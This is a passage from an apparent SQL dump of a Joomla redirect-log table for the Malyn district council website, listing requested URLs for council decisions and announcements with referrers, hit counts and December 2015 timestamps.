00:00:00',301),(19839,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&id=54:--29112013-&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-03 02:44:54','0000-00-00 00:00:00',301),(19840,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47:-21022013-&layout=blog&Itemid=86&lang=uk&limitstart=15','','','',1,0,'2015-12-03 04:03:37','0000-00-00 00:00:00',301),(19841,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=872:2012-12-17-18-45-20&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-03 05:48:01','0000-00-00 00:00:00',301),(19842,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/997-pro-vstanovlennya-nadbavki-do-posadovogo-okladu-premiyuvannya-ta-nadannya-materialnoji-dopomogi-golovi-rajonnoji-radi-ta-zastupniku-golovi-rajonnoji-radi-u-20','','','',1,0,'2015-12-03 06:23:49','0000-00-00 00:00:00',301),(19843,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&id=58:--30042014-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search?fm=1&q=%D0%BD%D0%B0%D0%B4%D0%B0%D0%BD%D0%BD%D1%8F+%D0%BF%D1%80%D0%B5%D0%BC%D1%96%D1%97+%D0%B0%D0%BF%D0%B0%D1%80%D0%B0%D1%82%D','',2,0,'2015-12-03 11:56:52','0000-00-00 00:00:00',301),(19844,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1141-budo-vorob-jivska-silska-rada-informue?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-03 13:43:01','0000-00-00 00:00:00',301),(19845,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=ru&layout=blog&option=com_content&view=category','','','',3,0,'2015-12-03 15:19:37','0000-00-00 00:00:00',301),(19846,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47:-21022013-&layout=blog&Itemid=86&lang=en&limitstart=20','','','',2,0,'2015-12-03 18:17:16','0000-00-00 00:00:00',301),(19847,'http://malyn-rayrada.org.ua/index.php/1181-pro-sklikannya-42-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-03 20:07:08','0000-00-00 00:00:00',301),(19848,'http://malyn-rayrada.org.ua/index.php/1187-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-42-sesiyu-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-03 20:07:27','0000-00-00 00:00:00',301),(19849,'http://malyn-rayrada.org.ua/index.php/17-na-malinshhini-svjato-ostannogo-dzvonika','','','',9,0,'2015-12-03 20:07:38','0000-00-00 00:00:00',301),(19850,'http://malyn-rayrada.org.ua/index.php/17-na-malinshhini-svjato-ostannogo-dzvonika?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-03 20:07:42','0000-00-00 00:00:00',301),(19851,'http://malyn-rayrada.org.ua/index.php/187-ogoloshennja?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-03 20:07:47','0000-00-00 00:00:00',301),(19852,'http://malyn-rayrada.org.ua/index.php/408-ogoloshennja_2','','','',6,0,'2015-12-03 20:07:59','0000-00-00 00:00:00',301),(19853,'http://malyn-rayrada.org.ua/index.php/952-grodadske-ob-ednannya-malinshchina-informue?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-03 20:11:18','0000-00-00 00:00:00',301),(19854,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1188-pro-vnesennya-zmin-do-strukturi-vikonavchogo-aparatu-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-03 20:11:31','0000-00-00 00:00:00',301),(19855,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1190-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-tov-yunigran?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-03 20:11:39','0000-00-00 00:00:00',301),(19856,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/374-pro-vtratu-chinnosti-rishennja-rajonnoi-radi-5?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-03 20:13:09','0000-00-00 00:00:00',301),(19857,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/164-pro-hid-vikonannja-rajonnoi-programi-pidtrimki?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-03 20:14:10','0000-00-00 00:00:00',301),(19858,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/47-pro-vnesennja-zmin-do-reglamentu-roboti-rajonnoi','','','',6,0,'2015-12-03 20:14:18','0000-00-00 00:00:00',301),(19859,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/79-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_3?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-03 20:14:23','0000-00-00 00:00:00',301),(19860,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/531-pro-prisvoennja-zvannja-pochesnogo-gromadjanina_3','','','',6,0,'2015-12-03 20:14:29','0000-00-00 00:00:00',301),(19861,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/532-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-03 20:14:32','0000-00-00 00:00:00',301),(19862,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/556-pro-pereobrannja-golovi-postijnoi-komisii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-03 20:14:45','0000-00-00 00:00:00',301),(19863,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/560-pro-stan-cilovogo-vikoristannja-zemel','','','',6,0,'2015-12-03 20:14:55','0000-00-00 00:00:00',301),(19864,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/328-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi','','','',7,0,'2015-12-03 20:15:33','0000-00-00 00:00:00',301),(19865,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/329-pro-vnesennja-zmin-do-rajonnoi-programi-rozvitku_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-03 20:15:35','0000-00-00 00:00:00',301),(19866,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/347-pro-pereukladennja-kontraktu-z-biloshickoju-l-v?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-03 20:15:47','0000-00-00 00:00:00',301),(19867,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=637:2012-04-03-12-34-11&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2015-12-03 23:39:49','0000-00-00 00:00:00',301),(19868,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1063-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-josipivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-04 06:11:41','0000-00-00 00:00:00',301),(19869,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1157-gorinska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-04 06:12:08','0000-00-00 00:00:00',301),(19870,'http://www.malyn-rayrada.org.ua/index.php/549-za-materialami-zvernen-rajonnoi-radi_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-04 06:13:00','0000-00-00 00:00:00',301),(19871,'http://www.malyn-rayrada.org.ua/index.php/581-likari-zasterigajut-dotrimujtes-gigieni?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-04 06:13:49','0000-00-00 00:00:00',301),(19878,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46&layout=blog&Itemid=85&lang=uk','','','',4,0,'2015-12-04 08:03:19','0000-00-00 00:00:00',301),(19879,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=860:09&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-04 08:06:23','0000-00-00 00:00:00',301),(19881,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=592:2012-02-27-15-06-10&Itemid=77&lang=en&option=com_content&view=article','','','',2,0,'2015-12-04 08:10:36','0000-00-00 00:00:00',301),(19882,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=739:2012-07-23-12-44-57&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-04 08:11:03','0000-00-00 00:00:00',301),(19883,'http://www.malyn-rayrada.org.ua/index.php?id=46&Itemid=85&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2015-12-04 08:11:15','0000-00-00 00:00:00',301),(19884,'http://www.malyn-rayrada.org.ua/index.php?id=31&Itemid=62&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2015-12-04 08:11:26','0000-00-00 00:00:00',301),(19885,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=846:2012-12-10-14-06-00&catid=46:--21122012&Itemid=85&lang=uk','','','',1,0,'2015-12-04 08:16:30','0000-00-00 00:00:00',301),(19886,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=846:2012-12-10-14-06-00&catid=46&Itemid=85&lang=ru','','','',1,0,'2015-12-04 08:18:08','0000-00-00 00:00:00',301),(19887,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=619:-11-6-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-04 08:33:55','0000-00-00 00:00:00',301),(19888,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=773:2012-10-02-06-48-57&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2015-12-04 08:48:37','0000-00-00 00:00:00',301),(19889,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=631:-i-2012-&catid=42:--16052012-&Itemid=80&lang=ru','','','',5,0,'2015-12-04 09:01:52','0000-00-00 00:00:00',301),(19890,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=771:-2012-2015-&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-12-04 12:21:45','0000-00-00 00:00:00',301),(19891,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:------qq&catid=15&lang=uk&Itemid=','','','',9,0,'2015-12-04 13:04:42','0000-00-00 00:00:00',301),(19892,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=997:-27-&catid=11&Itemid=14&lang=ru','','','',1,0,'2015-12-04 14:18:13','0000-00-00 00:00:00',301),(19893,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=uk','','','',3,0,'2015-12-04 14:34:35','0000-00-00 00:00:00',301),(19894,'http://www.malyn-rayrada.org.ua/index.php/1212-viddil-statistiki-u-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-04 16:18:24','0000-00-00 00:00:00',301),(19895,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=833:2012-11-30-06-51-18&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-04 16:45:44','0000-00-00 00:00:00',301),(19896,'http://www.malyn-rayrada.org.ua/index.php/603-ogoloshennja-akcija-miloserdja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-04 17:13:53','0000-00-00 00:00:00',301),(19897,'http://www.malyn-rayrada.org.ua/index.php/68-pro-provedennja-rajonnogo-konkursu-sered-silskih-i?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-04 17:13:56','0000-00-00 00:00:00',301),(19898,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=583:-l-lr&catid=40&Itemid=77&lang=ru','','','',3,0,'2015-12-04 19:00:38','0000-00-00 00:00:00',301),(19899,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=820:2012-11-14-16-42-11&catid=45:--14112012-&Itemid=84&lang=uk','','','',4,0,'2015-12-05 05:44:36','0000-00-00 00:00:00',301),(19900,'http://malyn-rayrada.org.ua/index.php/885-14-zhovtnya-svyato-pokrovi-presvyatoji-bogoroditsi/','','','',1,0,'2015-12-05 05:44:42','0000-00-00 00:00:00',301),(19901,'http://malyn-rayrada.org.ua/index.php/832-vidbulas-31-sesija-malinskoi-rajonnoi-radi','','','',3,0,'2015-12-05 05:44:42','0000-00-00 00:00:00',301),(19902,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/104-pro-utvorennja-frakcij','','','',4,0,'2015-12-05 05:44:46','0000-00-00 00:00:00',301),(19903,'http://malyn-rayrada.org.ua/index.php/479-porjadok-dennij-18-sesii-rajonnoi-radi-6','','','',6,0,'2015-12-05 06:35:46','0000-00-00 00:00:00',301),(19904,'http://www.malyn-rayrada.org.ua/index.php/1115-vidbulas-40-pozachergova-sesiya-rajonnoji-radi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-05 09:07:00','0000-00-00 00:00:00',301),(19905,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=724:-27042012252&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',13,0,'2015-12-05 09:54:14','0000-00-00 00:00:00',301),(19906,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=179:2010-11-30-09-08-30&catid=11&Itemid=16&lang=ru','','','',10,0,'2015-12-05 10:29:57','0000-00-00 00:00:00',301),(19907,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=631:-i-2012-&catid=42:--16052012-&Itemid=80&lang=ru','','','',1,0,'2015-12-05 16:19:27','0000-00-00 00:00:00',301),(19908,'http://www.malyn-rayrada.org.ua/index.php/71-novo-vorob’ivskij-znvkshkola-sad-i-iii-stupeniv','','','',4,0,'2015-12-05 18:31:01','0000-00-00 00:00:00',301),(19909,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=uk&limitstart=5','','https://www.google.com.ua/','',3,0,'2015-12-05 20:43:30','0000-00-00 00:00:00',301),(19910,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=uk','','https://www.google.com.ua/','',16,0,'2015-12-05 20:43:38','0000-00-00 00:00:00',301),(19911,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=443:-2011-&catid=37:--21102011-&Itemid=72&lang=en','','','',1,0,'2015-12-05 20:51:00','0000-00-00 00:00:00',301),(19912,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=206:2010-12-15-14-19-27&catid=29:--15122010-&Itemid=60&lang=uk','','','',4,0,'2015-12-05 21:37:21','0000-00-00 00:00:00',301),(19913,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/333-pro-vikonannja-planu-roboti-rajonnoi-radi-za-i','','','',9,0,'2015-12-05 21:44:54','0000-00-00 00:00:00',301),(19914,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=333:-2011-&catid=33:-20052011&Itemid=66&lang=ru','','','',1,0,'2015-12-05 21:53:48','0000-00-00 00:00:00',301),(19915,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/360-pro-vnesennja-zmin-do-polozhennja-pro-postijni','','','',12,0,'2015-12-05 22:03:31','0000-00-00 00:00:00',301),(19916,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/612-pro-vnesennja-zmin-do-programi-zajnjatosti_3','','','',11,0,'2015-12-05 22:05:16','0000-00-00 00:00:00',301),(19917,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1094:2013-09-24-05-02-52&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-06 00:10:20','0000-00-00 00:00:00',301),(19918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=70&lang=en&limitstart=10','','','',3,0,'2015-12-06 02:29:27','0000-00-00 00:00:00',301),(19919,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=70&lang=en&limitstart=10','','','',1,0,'2015-12-06 03:32:30','0000-00-00 00:00:00',301),(19920,'http://www.malyn-rayrada.org.ua/index.php?Itemid=9&catid=6&id=6:2010-06-05-14-26-47&lang=ru&option=com_content&view=article','','','',5,0,'2015-12-06 07:47:47','0000-00-00 00:00:00',301),(19921,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2015-12-06 09:33:02','0000-00-00 00:00:00',301),(19922,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=816:2012-11-14-16-33-01&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-06 10:23:03','0000-00-00 00:00:00',301),(19923,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-?start=25','','','',1,0,'2015-12-06 11:02:24','0000-00-00 00:00:00',301),(19924,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2015-12-06 11:16:48','0000-00-00 00:00:00',301),(19925,'http://malyn-rayrada.org.ua/index.php/252-vitaemo-iz-svjatom-pershogo-dzvonika','','','',16,0,'2015-12-06 13:04:54','0000-00-00 00:00:00',301),(19926,'http://malyn-rayrada.org.ua/index.php/385-rezultati-ekzit-poliv','','','',13,0,'2015-12-06 13:05:08','0000-00-00 00:00:00',301),(19927,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=273:-2011-&catid=31&Itemid=62&lang=uk','','','',1,0,'2015-12-06 15:31:30','0000-00-00 00:00:00',301),(19928,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=320:-2010-2014-&catid=33&Itemid=66&lang=uk','','','',1,0,'2015-12-06 15:44:44','0000-00-00 00:00:00',301),(19929,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=692:-2012&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-12-06 16:32:41','0000-00-00 00:00:00',301),(19930,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1048:2013-07-10-05-53-06&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-06 17:56:17','0000-00-00 00:00:00',301),(19931,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=864:-qq&lang=uk&layout=default&option=com_content&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=864:-qq&lang=uk&layout=default&option=com_content&page&print=1&tmp','',4,0,'2015-12-06 18:34:15','0000-00-00 00:00:00',301),(19932,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=40&layout=blog&Itemid=77&lang=en&limitstart=5','','','',1,0,'2015-12-06 22:41:29','0000-00-00 00:00:00',301),(19933,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=en&limitstart=5','','','',1,0,'2015-12-06 22:52:17','0000-00-00 00:00:00',301),(19934,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=40:--28032012-&layout=blog&Itemid=77&lang=en&limitstart=5','','','',2,0,'2015-12-06 23:25:19','0000-00-00 00:00:00',301),(19935,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&catid=5&Itemid=6&lang=en','','','',57,0,'2015-12-06 23:47:30','0000-00-00 00:00:00',301),(19936,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=uk','','','',4,0,'2015-12-07 04:32:15','0000-00-00 00:00:00',301),(19937,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=165:2010-11-17-13-23-56&catid=11&Itemid=16&lang=uk','','','',2,0,'2015-12-07 06:14:55','0000-00-00 00:00:00',301),(19938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=uk&limitstart=10','','','',3,0,'2015-12-07 07:15:51','0000-00-00 00:00:00',301),(19939,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=ru&limitstart=10','','','',1,0,'2015-12-07 07:16:37','0000-00-00 00:00:00',301),(19940,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=488:2011-12-02-06-34-46&catid=38&Itemid=73&lang=ru','','','',1,0,'2015-12-07 07:16:39','0000-00-00 00:00:00',301),(19941,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=uk&limitstart=5','','','',3,0,'2015-12-07 07:17:50','0000-00-00 00:00:00',301),(19942,'http://www.malyn-rayrada.org.ua/index.php/1034-vitaemo-iz-svyatom-vesni?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-07 07:17:52','0000-00-00 00:00:00',301),(19943,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=507:2011-12-19-17-10-52&catid=11&lang=ru','','','',2,0,'2015-12-07 07:18:27','0000-00-00 00:00:00',301),(19944,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=515:2011-12-22-10-09-17&catid=38&Itemid=73&lang=ru','','','',1,0,'2015-12-07 07:18:28','0000-00-00 00:00:00',301),(19945,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=en','','','',5,0,'2015-12-07 08:09:56','0000-00-00 00:00:00',301),(19946,'http://www.malyn-rayrada.org.ua/index.php?Itemid=2&catid=5:2010-06-05-12-51-34&id=519:-2011-&lang=uk&layout=default&option=com_content&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=2&catid=5:2010-06-05-12-51-34&id=519:-2011-&lang=uk&layout=default&option=com_content&page&print=1&tm','',3,0,'2015-12-07 09:27:09','0000-00-00 00:00:00',301),(19947,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=562:-19122011194-30122011202&catid=39:-22022012-&Itemid=76&lang=uk','','','',14,0,'2015-12-07 10:13:05','0000-00-00 00:00:00',301),(19948,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=581:2012-02-27-13-13-19&catid=40&Itemid=77&lang=en','','','',2,0,'2015-12-07 10:44:47','0000-00-00 00:00:00',301),(19949,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=879:2012-12-21-17-02-01&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-07 11:36:00','0000-00-00 00:00:00',301),(19950,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=734:-6-2012-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-07 12:16:38','0000-00-00 00:00:00',301),(19951,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=489:2011-12-02-06-51-07&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-12-07 15:12:01','0000-00-00 00:00:00',301),(19952,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=50&Itemid=90&lang=ru','','','',5,0,'2015-12-07 19:57:42','0000-00-00 00:00:00',301),(19953,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-?start=7','','','',18,0,'2015-12-07 20:29:09','0000-00-00 00:00:00',301),(19954,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11&Itemid=14&lang=ru','','','',3,0,'2015-12-07 20:42:04','0000-00-00 00:00:00',301),(19955,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=869:2012-12-16-16-05-45&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-07 20:42:06','0000-00-00 00:00:00',301),(19956,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=718:2012-06-14-15-24-50&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',8,0,'2015-12-07 20:58:26','0000-00-00 00:00:00',301),(19957,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=505:2011-12-16-13-24-32&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-07 21:41:18','0000-00-00 00:00:00',301),(19958,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=488:2011-12-02-06-34-46&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-12-07 21:51:47','0000-00-00 00:00:00',301),(19959,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=479:2011-11-28-07-33-14&catid=38:--19122011-&Itemid=73&lang=uk','','','',4,0,'2015-12-07 21:57:10','0000-00-00 00:00:00',301),(19960,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1214:2014-02-18-09-51-45&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-07 22:02:58','0000-00-00 00:00:00',301),(19961,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=407:-l-r-2010-2015-&catid=37&Itemid=72&lang=uk','','','',10,0,'2015-12-07 22:13:47','0000-00-00 00:00:00',301),(19962,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&lang=en','','','',11,0,'2015-12-07 22:53:48','0000-00-00 00:00:00',301),(19963,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=797:-6-16112010-5-&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-08 01:15:28','0000-00-00 00:00:00',301),(19964,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku?start=7','','','',7,0,'2015-12-08 01:58:57','0000-00-00 00:00:00',301),(19965,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1061-pro-zvernennya-do-prem-er-ministra-ukrajini-shchodo-vstanovlennya-pilgovikh-tarifiv-na-prirodnij-gaz-ta-elektroenergiyu-dlya-naselennya-yake-prozhivae-v-sils','','','',1,0,'2015-12-08 02:04:59','0000-00-00 00:00:00',301),(19966,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=317:-l-2008-2012-r&catid=33:-20052011&Itemid=66&lang=uk','','','',2,0,'2015-12-08 03:47:19','0000-00-00 00:00:00',301),(19967,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=543:2012-01-26-11-58-53&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-08 04:17:01','0000-00-00 00:00:00',301),(19968,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=542:--------------2011-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2015-12-08 04:55:03','0000-00-00 00:00:00',301),(19969,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&id=39&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-08 05:51:23','0000-00-00 00:00:00',301),(19970,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=196:---------------------2005-2010-&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-08 07:21:07','0000-00-00 00:00:00',301),(19971,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=634:-2016-&catid=42&Itemid=80&lang=ru','','','',1,0,'2015-12-08 11:20:19','0000-00-00 00:00:00',301),(19972,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=634:-2016-&catid=42&Itemid=80&lang=uk','','','',8,0,'2015-12-08 12:07:12','0000-00-00 00:00:00',301),(19973,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=329:2011-05-20-16-25-10&catid=33&Itemid=66&lang=uk','','','',2,0,'2015-12-08 12:55:01','0000-00-00 00:00:00',301),(19974,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=692:-2012&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-08 16:29:37','0000-00-00 00:00:00',301),(19975,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=en','','','',4,0,'2015-12-08 16:58:53','0000-00-00 00:00:00',301),(19976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=464:2011-11-11-12-15-19&catid=38:--19122011-&Itemid=73&lang=ru','','','',6,0,'2015-12-08 17:05:16','0000-00-00 00:00:00',301),(19977,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/206-pro-hid-vikonannja-kompleksnoi-dovgostrokovoi','','','',4,0,'2015-12-08 17:56:00','0000-00-00 00:00:00',301),(19978,'http://malyn-rayrada.org.ua/index.php/1191-dopomozheno-dityam-razom','','','',8,0,'2015-12-08 17:56:10','0000-00-00 